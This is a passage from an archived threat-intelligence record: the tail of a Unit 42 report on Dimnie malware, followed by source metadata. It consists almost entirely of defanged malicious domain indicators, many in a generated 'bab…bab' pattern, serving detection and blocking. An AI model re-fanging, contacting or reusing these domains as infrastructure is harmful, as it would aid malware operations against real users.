40\n\nbabmehbab[.]pw\r\nbabmibbab2[.]space\r\nbabmihbab[.]xyz\r\nbabmilbab[.]pw\r\nbabmohbab[.]rocks\r\nbabmulbab[.]rocks\r\nbabnabbab2[.]space\r\nbabnebbab[.]biz\r\nbabnebbab2[.]biz\r\nbabnehbab[.]rocks\r\nbabnibbab2[.]in\r\nbabnihbab[.]space\r\nbabnohbab[.]biz\r\nbabnulbab[.]biz\r\nbabpabbab2[.]in\r\nbabpebbab[.]org\r\nbabpebbab2[.]org\r\nbabpehbab[.]biz\r\nbabpibbab2[.]ru\r\nbabpihbab[.]in\r\nbabplabbab2[.]org\r\nbabplebbab[.]ru\r\nbabplebbab2[.]ru\r\nbabplehbab[.]in\r\nbabplibbab[.]com\r\nbabplifbab[.]ru\r\nbabplihbab[.]org\r\nbabplohbab[.]host\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 31 of 40\n\nbabplulbab[.]host\r\nbabpohbab[.]org\r\nbabprabbab2[.]com\r\nbabprebbab[.]ua\r\nbabprebbab2[.]ua\r\nbabprehbab[.]host\r\nbabpribbab[.]link\r\nbabprihbab[.]com\r\nbabprulbab[.]top\r\nbabpulbab[.]org\r\nbabrabbab2[.]ru\r\nbabrebbab[.]com\r\nbabrebbab2[.]com\r\nbabrehbab[.]org\r\nbabribbab2[.]ua\r\nbabrihbab[.]host\r\nbabrohbab[.]com\r\nbabrulbab[.]com\r\nbabsabbab2[.]ua\r\nbabsahbab[.]host\r\nbabsebbab[.]link\r\nbabsebbab2[.]link\r\nbabsehbab[.]com\r\nbabsibbab2[.]pw\r\nbabsihbab[.]top\r\nbabskabbab2[.]link\r\nbabskebbab[.]pw\r\nbabskebbab2[.]pw\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 32 of 40\n\nbabskehbab[.]top\r\nbabskibbab[.]xyz\r\nbabskihbab[.]link\r\nbabslabbab2[.]xyz\r\nbabslebbab2[.]rocks\r\nbabslehbab[.]pw\r\nbabslibbab[.]space\r\nbabslihbab[.]xyz\r\nbabsmabbab2[.]space\r\nbabsmebbab2[.]biz\r\nbabsmehbab[.]rocks\r\nbabsmibbab[.]in\r\nbabsmihbab[.]space\r\nbabsnabbab2[.]in\r\nbabsnebbab2[.]org\r\nbabsnehbab[.]biz\r\nbabsnibbab[.]ru\r\nbabsnihbab[.]in\r\nbabsofbab[.]pw\r\nbabsohbab[.]link\r\nbabspabbab[.]ru\r\nbabspabbab2[.]ru\r\nbabspebbab2[.]com\r\nbabspefbab[.]ru\r\nbabspehbab[.]org\r\nbabspibbab[.]ua\r\nbabspihbab[.]host\r\nbabspolbab[.]host\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 33 of 40\n\nbabstabbab[.]ua\r\nbabstabbab2[.]ua\r\nbabstebbab2[.]link\r\nbabstefbab[.]com\r\nbabstehbab[.]com\r\nbabstibbab[.]pw\r\nbabstihbab[.]top\r\nbabstolbab[.]top\r\nbabstrabbab[.]pw\r\nbabstrabbab2[.]pw\r\nbabstrebbab2[.]xyz\r\nbabstrefbab[.]pw\r\nbabstrehbab[.]link\r\nbabstribbab[.]rocks\r\nbabstrihbab[.]pw\r\nbabstrolbab[.]pw\r\nbabsulbab[.]link\r\nbabswabbab[.]rocks\r\nbabswabbab2[.]rocks\r\nbabswebbab2[.]space\r\nbabswehbab[.]xyz\r\nbabswibbab[.]biz\r\nbabswihbab[.]rocks\r\nbabswolbab[.]rocks\r\nbabtabbab2[.]pw\r\nbabtahbab[.]top\r\nbabtebbab[.]xyz\r\nbabtebbab2[.]xyz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 34 of 40\n\nbabtehbab[.]link\r\nbabtibbab2[.]rocks\r\nbabtihbab[.]pw\r\nbabtohbab[.]xyz\r\nbabtrabbab[.]biz\r\nbabtrabbab2[.]biz\r\nbabtrebbab2[.]in\r\nbabtrehbab[.]space\r\nbabtribbab[.]org\r\nbabtrihbab[.]biz\r\nbabtrolbab[.]biz\r\nbabtulbab[.]xyz\r\nbabvabbab2[.]rocks\r\nbabvahbab[.]pw\r\nbabvebbab[.]space\r\nbabvebbab2[.]space\r\nbabvehbab[.]xyz\r\nbabvibbab2[.]biz\r\nbabvihbab[.]rocks\r\nbabvohbab[.]space\r\nbabvulbab[.]space\r\nbabwabbab2[.]biz\r\nbabwahbab[.]rocks\r\nbabwebbab[.]in\r\nbabwebbab2[.]in\r\nbabwehbab[.]space\r\nbabwibbab2[.]org\r\nbabwihbab[.]biz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 35 of 40\n\nbabwohbab[.]in\r\nbabwulbab[.]in\r\nbabyabbab2[.]org\r\nbabyahbab[.]biz\r\nbabyebbab[.]ru\r\nbabyebbab2[.]ru\r\nbabyehbab[.]in\r\nbabyibbab2[.]com\r\nbabyihbab[.]org\r\nbabyohbab[.]host\r\nbabyulbab[.]host\r\nbabzabbab2[.]com\r\nbabzahbab[.]org\r\nbabzebbab[.]ua\r\nbabzebbab2[.]ua\r\nbabzehbab[.]host\r\nbabzibbab2[.]link\r\nbabzihbab[.]com\r\nbabzohbab[.]top\r\nbabzulbab[.]top\r\nbannarbor[.]pw\r\nbisquitshore[.]xyz\r\nbitrixon[.]biz\r\nbuhgalter[.]pw\r\nbuhgalter[.]rocks\r\nbuhgalters[.]xyz\r\nbusinessolution[.]site\r\ncheturion[.]org\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 36 of 40\n\nchipacom[.]net\r\ncloneduring[.]pw\r\ncompanysafa[.]biz\r\ncorpofname[.]pw\r\ndatamining[.]press\r\ndersteoyna[.]pw\r\ndovnikus[.]su\r\nefros[.]pw\r\nflashclicks[.]info\r\nforbusinessgo[.]xyz\r\nfortificar[.]net\r\nfracking[.]host\r\ngateoflife[.]pw\r\ngaz[.]rocks\r\ngedealer[.]pw\r\nglobuspp[.]pw\r\ngrandvita[.]pw\r\ngreenlanterns[.]xyz\r\ngreenworldsun[.]xyz\r\nguardomorph[.]com\r\nguwang[.]pw\r\njobforreborn[.]xyz\r\nkokinatsu[.]pw\r\nkukuzaki[.]me\r\nkupala[.]me\r\nlastsnow[.]link\r\nmaradonianos[.]pw\r\nmercurytod[.]pw\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 37 of 40\n\nmuxa[.]club\r\nmycorpsafa[.]biz\r\nn-nalog78[.]com\r\nnewsunconcept[.]in\r\nnewsupport[.]us\r\nnothingmore[.]us\r\nnovayarabota[.]pw\r\nnvpn[.]pw\r\nodejda77[.]net\r\nokvd[.]biz\r\nolen[.]bid\r\nonechat[.]pw\r\nplacetobuy[.]pw\r\nplatej[.]pw\r\npoplata-da[.]org\r\nportw[.]org\r\npowersand[.]link\r\npricemeet[.]pw\r\npuldisk[.]xyz\r\nrabotadnya[.]pw\r\nraintor[.]pw\r\nricarier[.]org\r\nrosgaz[.]pw\r\nrumoney[.]xyz\r\nsalesforlife[.]top\r\nsalesline[.]top\r\nsam-sam[.]pw\r\nsandstyle[.]biz\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 38 of 40\n\nsandw[.]pw\r\nsantrimo[.]lol\r\nseclist[.]site\r\nseclist[.]top\r\nselenaspace[.]space\r\nsellgrax[.]club\r\nsemodo[.]pw\r\nsensetunoespossible[.]cat\r\nshortsell[.]trade\r\nshortselling[.]club\r\nsixgoats[.]pw\r\nsnp500[.]trade\r\nsolotender[.]pw\r\nsslprivate[.]org\r\ntapalulumba[.]com\r\ntaskhoper[.]com\r\ntitleworld[.]pw\r\ntorglend[.]com\r\ntradertop[.]top\r\ntrendkop[.]pw\r\ntyuocruz1312[.]net\r\nuchet[.]pw\r\nuchet[.]space\r\nvisitpalace[.]xyz\r\nvolumexp[.]xyz\r\nvortexenism[.]biz\r\nvpnserv[.]pw\r\nvwv.flashclicks[.]info\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 39 of 40\n\nwinsocket[.]xyz\r\nyearreviews[.]net\r\nIgnite ’17 Security Conference: Vancouver, BC June 12–15, 2017\r\nIgnite ’17 Security Conference is a live, four-day conference designed for today’s security professionals. Hear from\r\ninnovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how\r\nbreach prevention is changing the security industry. Visit the Ignite website for more information on tracks, workshops\r\nand marquee sessions.\r\nUpdated 3/30/17: To remove unnecessary IPS Signature number.\r\nSource: http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 40 of 40",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
	],
	"report_names": [
		"unit42-dimnie-hiding-plain-sight"
	],
	"threat_actors": [],
	"ts_created_at": 1775434491,
	"ts_updated_at": 1775791272,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.pdf",
		"text": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.txt",
		"img": "https://archive.orkl.eu/200ff5d67f1ef5daebe43a808410039c47fa3c51.jpg"
	}
}